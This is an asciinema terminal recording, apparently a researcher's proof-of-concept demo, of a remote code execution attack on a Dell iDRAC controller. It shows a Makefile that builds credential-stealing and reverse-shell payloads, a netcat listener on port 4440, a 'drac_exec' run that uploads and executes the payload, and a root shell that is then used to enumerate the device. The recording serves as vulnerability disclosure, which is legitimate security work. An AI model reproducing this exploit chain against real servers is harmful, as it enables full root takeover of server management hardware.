{"version": 2, "width": 115, "height": 32, "timestamp": 1623185569, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.008992, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[c\u001b[1337n\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;32r\u001b[1;1H"]
[0.009924, "o", "\u001b]0;babbage\u0007\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[demo] 0:tmux*                                                                            \"babbage\" 15:52 08-Jun-21\u001b(B\u001b[m\u001b[1;1H\u001b[?12l\u001b[?25h"]
[0.010044, "o", "\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;32r\u001b[1;1H"]
[0.010768, "o", "\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[demo] 0:tmux*                                                                            \"babbage\" 15:52 08-Jun-21\u001b(B\u001b[m\u001b[1;1H\u001b[?12l\u001b[?25h"]
[0.010868, "o", "\u001b[?69h\u001b[1;32r\u001b[s\u001b[1;1H"]
[0.014079, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                  \u001b[1;1H \u001b[H"]
[0.01481, "o", "\u001b[1;31r\u001b[2;31r\u001b[30S\u001b[1;1H\u001b[Kbabbage% \u001b[K\u001b[1;32r\u001b[1;10H\u001b[?2004h"]
[1.010155, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[32;1H[demo] 0:zsh*                                                                             \"babbage\" 15:52 08-Jun-21\u001b(B\u001b[m\u001b[1;10H\u001b[?12l\u001b[?25h"]
[1.463751, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[32;1H[demo] 0:drac_rce*                                                                        \"babbage\" 15:52 08-Jun-21\u001b(B\u001b[m\u001b[1;10H\u001b[?12l\u001b[?25h"]
[1.467201, "o", "c"]
[1.570733, "o", "\bca"]
[1.674183, "o", "t"]
[1.777839, "o", " "]
[1.881094, "o", "M"]
[1.985804, "o", "a"]
[2.090002, "o", "k"]
[2.19329, "o", "e"]
[2.29705, "o", "f"]
[2.401368, "o", "i"]
[2.505773, "o", "l"]
[2.609926, "o", "e"]
[2.713948, "o", "\r\n\u001b[?2004l"]
[2.720066, "o", "get_creds:\u001b[3;9Hsh4-linux-gnu-gcc -shared -fPIC ./get_creds.c -o ./payload.so\u001b[5;1Hget_shell:\u001b[6;9Hsh4-linux-gnu-gcc -DLHOST=\\\"10.87.1.10\\\" -DLPORT=4440 -shared -fPIC ./get_shell.c -o ./payload.so \r\n"]
[2.720268, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                  \u001b[7;1H \r\u001b[1;31r\u001b[8;31r\u001b[24S\u001b[7;1H\u001b[Kbabbage% \u001b[K"]
[2.720364, "o", "\u001b[1;32r\u001b[7;10H\u001b[?2004h"]
[6.819736, "o", "m"]
[6.923983, "o", "\bma"]
[7.027099, "o", "k"]
[7.130386, "o", "e"]
[7.233496, "o", " "]
[7.336522, "o", "g"]
[7.4395, "o", "e"]
[7.542495, "o", "t"]
[7.645571, "o", "_"]
[7.748576, "o", "s"]
[7.851912, "o", "h"]
[7.954968, "o", "e"]
[8.059102, "o", "l"]
[8.163358, "o", "l"]
[8.267821, "o", "\r\u001b[?2004l\r\n"]
[8.271153, "o", "sh4-linux-gnu-gcc -DLHOST=\\\"10.87.1.10\\\" -DLPORT=4440 -shared -fPIC ./get_shell.c -o ./payload.so \r\n"]
[8.323392, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                  \u001b[9;1H \u001b[1;31r\u001b[10;31r\u001b[22S\u001b[9;1H\u001b[Kbabbage% \u001b[K\u001b[1;32r\u001b[9;10H\u001b[?2004h"]
[10.374406, "o", "\u001b[16;1H──────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1Hbabbage% cat Makefile\u001b[K\r\nget_creds:\u001b[K\u001b[3;8H\u001b[1K\u001b[Csh4-linux-gnu-gcc -shared -fPIC ./get_creds.c -o ./payload.so\u001b[K\r\n\u001b[K\r\nget_shell:\u001b[K\u001b[6;8H\u001b[1K\u001b[Csh4-linux-gnu-gcc -DLHOST=\\\"10.87.1.10\\\" -DLPORT=4440 -shared -fPIC ./get_shell.c -o ./payload.so \u001b[K\r\nbabbage% make get_shell\u001b[K\r\nsh4-linux-gnu-gcc -DLHOST=\\\"10.87.1.10\\\" -DLPORT=4440 -shared -fPIC ./get_shell.c -o ./payload.so \u001b[K\r\nbabbage% \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[demo] 0:drac_rce*                                                                        \"babbage\" 15:53 08-Jun-21\u001b(B\u001b[m\u001b[17;1H\u001b[?12l\u001b"]
[10.374741, "o", "[?25h\u001b[?2004l\u001b[1;15r\u001b[10;15r\u001b[6S\u001b[9;1H\u001b[Kbabbage% \u001b[1;32r\u001b[17;1H"]
[10.377209, "o", "n"]
[10.379287, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                  \r \r"]
[10.380013, "o", "\u001b[17;31r\u001b[19;31r\u001b[13S\u001b[18;1H\u001b[Kbabbage% \u001b[Kn\u001b[1;32r\u001b[18;11H\u001b[?2004h"]
[10.480976, "o", "\bnc"]
[10.58452, "o", " "]
[10.68771, "o", "-"]
[10.790723, "o", "v"]
[10.894338, "o", " "]
[10.998382, "o", "-"]
[11.101498, "o", "l"]
[11.204532, "o", " "]
[11.307503, "o", "-"]
[11.410907, "o", "p"]
[11.514879, "o", " "]
[11.618202, "o", "4"]
[11.721221, "o", "4"]
[11.824389, "o", "4"]
[11.927504, "o", "0"]
[12.030842, "o", "\r\n\u001b[?2004l"]
[12.789159, "o", "Listening on [0.0.0.0] (family 2, port 4440)\r\n"]
[14.136759, "o", "\u001b[9;10HL\u001b[20;1H"]
[14.240247, "o", "\u001b[9;10HLO\u001b[20;1H"]
[14.343898, "o", "\u001b[9;12HG\u001b[20;1H"]
[14.447638, "o", "\u001b[9;13HL\u001b[20;1H"]
[14.55104, "o", "\u001b[9;14HE\u001b[20;1H"]
[14.654364, "o", "\u001b[9;15HV\u001b[20;1H"]
[14.757753, "o", "\u001b[9;16HE\u001b[20;1H"]
[14.860808, "o", "\u001b[9;17HL\u001b[20;1H"]
[14.963843, "o", "\u001b[9;18H=\u001b[20;1H"]
[15.066833, "o", "\u001b[9;19HI\u001b[20;1H"]
[15.170927, "o", "\u001b[9;20HN\u001b[20;1H"]
[15.274283, "o", "\u001b[9;21HF\u001b[20;1H"]
[15.378819, "o", "\u001b[9;22HO\u001b[20;1H"]
[15.482857, "o", "\u001b[9;23H \u001b[20;1H"]
[15.586896, "o", "\u001b[9;24H.\u001b[20;1H"]
[15.689936, "o", "\u001b[9;25H/\u001b[20;1H"]
[15.794197, "o", "\u001b[9;26Hd\u001b[20;1H"]
[15.897835, "o", "\u001b[9;27Hr\u001b[20;1H"]
[16.001961, "o", "\u001b[9;28Ha\u001b[20;1H"]
[16.105236, "o", "\u001b[9;29Hc\u001b[20;1H"]
[16.208324, "o", "\u001b[9;30H_\u001b[20;1H"]
[16.311418, "o", "\u001b[9;31He\u001b[20;1H"]
[16.414483, "o", "\u001b[9;32Hx\u001b[20;1H"]
[16.517738, "o", "\u001b[9;33He\u001b[20;1H"]
[16.620853, "o", "\u001b[9;34Hc\u001b[20;1H"]
[16.724169, "o", "\u001b[9;35H \u001b[20;1H"]
[16.827368, "o", "\u001b[9;36H1\u001b[20;1H"]
[16.930863, "o", "\u001b[9;37H0\u001b[20;1H"]
[17.034377, "o", "\u001b[9;38H.\u001b[20;1H"]
[17.137486, "o", "\u001b[9;39H8\u001b[20;1H"]
[17.241094, "o", "\u001b[9;40H7\u001b[20;1H"]
[17.344139, "o", "\u001b[9;41H.\u001b[20;1H"]
[17.447292, "o", "\u001b[9;42H5\u001b[20;1H"]
[17.55029, "o", "\u001b[9;43H.\u001b[20;1H"]
[17.654058, "o", "\u001b[9;44H4\u001b[20;1H"]
[17.757214, "o", "\u001b[9;45H2\u001b[20;1H"]
[18.357365, "o", "\u001b[10dINFO:drac_exec:DRAC detected\u001b[20;1H"]
[18.436262, "o", "\u001b[9AINFO:drac_exec:Payload successfully uploaded\u001b[20;1H"]
[18.468805, "o", "\u001b[8AINFO:drac_exec:Attempting to execute payload\u001b[20;1H"]
[18.495456, "o", "\u001b[7A\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                  \u001b[13;1H \u001b[1;15r\u001b[14;1H\u001b[K\r\n\u001b[K\u001b[2A\u001b[Kbabbage% \u001b[1;32r\u001b[20;1H\u001b[13;10H\u001b[K\u001b[20;1H"]
[19.818437, "o", "Connection from 10.87.5.42 47145 received!\r\n"]
[20.966663, "o", "\u001b[32mi"]
[21.071516, "o", "d"]
[21.17568, "o", "\r\n"]
[21.201883, "o", "\u001b[33muid=0(root) gid=0(root)\r\n"]
[22.282171, "o", "\u001b[?25l\u001b[Hn\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                 babbage% nc -v -l -p 4440\u001b[K\r\nListening on [0.0.0.0] (family 2, port 4440)\u001b[K\r\nConnection from 10.87.5.42 47145 received!\u001b[K\r\n\u001b[32mid\u001b[K\r\n\u001b[33muid=0(root) gid=0(root)\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[demo] 0:drac_rce*                                                                        \"babbage\" 15:53 08-Jun-21\u001b(B\u001b[m\u001b[7;1H\u001b[?12l\u001b[?25h"]
[22.284291, "o", "\u001b[32mu"]
[22.387443, "o", "n"]
[22.490868, "o", "a"]
[22.594371, "o", "m"]
[22.697526, "o", "e"]
[22.801044, "o", " "]
[22.905642, "o", "-"]
[23.010309, "o", "a"]
[23.113451, "o", "\r\n"]
[23.133713, "o", "\u001b[33mLinux idrac-G582DZ1 3.4.11 #1 Thu Aug 18 13:03:21 CDT 2016 sh4a GNU/Linux\r\n"]
[24.219528, "o", "\u001b[32mc"]
[24.322872, "o", "a"]
[24.426153, "o", "t"]
[24.530293, "o", " "]
[24.634064, "o", "/"]
[24.737515, "o", "p"]
[24.841295, "o", "r"]
[24.944518, "o", "o"]
[25.048995, "o", "c"]
[25.1522, "o", "/"]
[25.256345, "o", "v"]
[25.36047, "o", "e"]
[25.463982, "o", "r"]
[25.567136, "o", "s"]
[25.670456, "o", "i"]
[25.774255, "o", "o"]
[25.877848, "o", "n"]
[25.981066, "o", "\r\n"]
[26.000826, "o", "\u001b[33mLinux version 3.4.11 (jenkins@gitbuild12g105) (gcc version 4.7.2 (GCC) ) #1 Thu Aug 18 13:03:21 CDT 2016\r\n"]
[27.085854, "o", "\u001b[32ms"]
[27.190011, "o", "y"]
[27.293122, "o", "s"]
[27.396195, "o", "t"]
[27.499439, "o", "e"]
[27.602393, "o", "m"]
[27.706392, "o", "c"]
[27.809592, "o", "t"]
[27.913745, "o", "l"]
[28.01778, "o", " "]
[28.121226, "o", "-"]
[28.225307, "o", "-"]
[28.328546, "o", "t"]
[28.431581, "o", "y"]
[28.535658, "o", "p"]
[28.638369, "o", "e"]
[28.742268, "o", "="]
[28.846021, "o", "s"]
[28.950044, "o", "e"]
[29.053012, "o", "r"]
[29.157142, "o", "v"]
[29.260265, "o", "i"]
[29.363523, "o", "c"]
[29.466681, "o", "e"]
[29.569697, "o", " "]
[29.67315, "o", "l"]
[29.777385, "o", "i"]
[29.88078, "o", "s"]
[29.984598, "o", "t"]
[30.089057, "o", "-"]
[30.193231, "o", "u"]
[30.297298, "o", "n"]
[30.40099, "o", "i"]
[30.504258, "o", "t"]
[30.607476, "o", "-"]
[30.710961, "o", "f"]
[30.814171, "o", "i"]
[30.917729, "o", "l"]
[31.021137, "o", "e"]
[31.125478, "o", "s"]
[31.229904, "o", " "]
[31.333077, "o", "|"]
[31.437377, "o", " "]
[31.541479, "o", "g"]
[31.645649, "o", "r"]
[31.749802, "o", "e"]
[31.852822, "o", "p"]
[31.955819, "o", " "]
[32.058872, "o", "e"]
[32.161997, "o", "n"]
[32.265078, "o", "a"]
[32.368075, "o", "b"]
[32.472199, "o", "l"]
[32.576559, "o", "e"]
[32.679742, "o", "d"]
[32.78338, "o", "\r\n"]
[35.290241, "o", "\u001b[1;31r\u001b[11S\u001b[H\u001b[33maim-post.service                       enabled \r\naim.service                            enabled \r\napply-bmc-settings.service             enabled \r\nappweb.service                         enabled \r\naps.service                            enabled \r\navahi-usb0.service                     enabled \r\nbnr-host-poweron.service               enabled \r\ncfgbkup.service                        enabled \r\ncgroup-init.service                    enabled \r\nclear_private_store.service            enabled \r\nclockwatcher.service                   enabled \r\nclpd.service                           enabled \r\nCMC_IMC_communication_monitor.service  enabled \r\ncmcServer.service                      enabled \r\ncmcTelnetd.service                     enabled \r\ncredential-vault-12g.service           enabled \r\ncredential-vault-13g.service           enabled \r\ncrond_custom.service                   enabled \r\ndata-engine-boot.service               enabled \r\ndata-engine.service                    enabled \r\ndebug-postinit.service       "]
[35.290525, "o", "          enabled \r\ndebug-preinit.service                  enabled \r\ndebug-vmstat.service                   enabled \r\ndebugcontrol.service                   enabled \r\ndhclient_daemon.service                enabled \r\ndisable_debug_arev.service             enabled \r\ndm-event.service                       enabled \r\ndm-snmp.service                        enabled \r\ndm-stage2.service                      enabled \r\ndriver-load-usb.service                enabled \r\ndriver-l\u001b[1;32r\u001b[31;9H\u001b[1;31r\u001b[31S\u001b[Hnfcd.service                           enabled \r\nnfs.service                            enabled \r\nosinet.service                         enabled \r\nosinet_init.service                    enabled \r\nosinet_init_modular.service            enabled \r\nosinterface.service                    enabled \r\npersonality_module.service             enabled \r\npm.service                             enabled \r\npost-init-cleanup.service              enabled \r\nracadm_ipmiextd.service                enabled \r\nracadm_raclogd.service              "]
[35.290662, "o", "   enabled \r\nRFS.service                            enabled \r\nrngd.service                           enabled \r\nrsmd.service                           enabled \r\nsetup-flash.service                    enabled \r\nsfcbd.service                          enabled \r\nsshd.service                           enabled \r\nsyscallagent.service                   enabled \r\nsyslog.service                         enabled \r\ntelnetd_app.service                    enabled \r\ntm_app.service                         enabled \r\ntrab_asdf.service                      enabled \r\nttymonitor.service                     enabled \r\nunique_certificate.service             enabled \r\nusb0.service                           enabled \r\nusb_app.service                        enabled \r\nverify_maser.service                   enabled \r\nVFK.service                            enabled \r\nVKVM_PM.service                        enabled \r\nvnc-server.service                     enabled \r\nvnc.service     \u001b[1;32r\u001b[31;17H"]
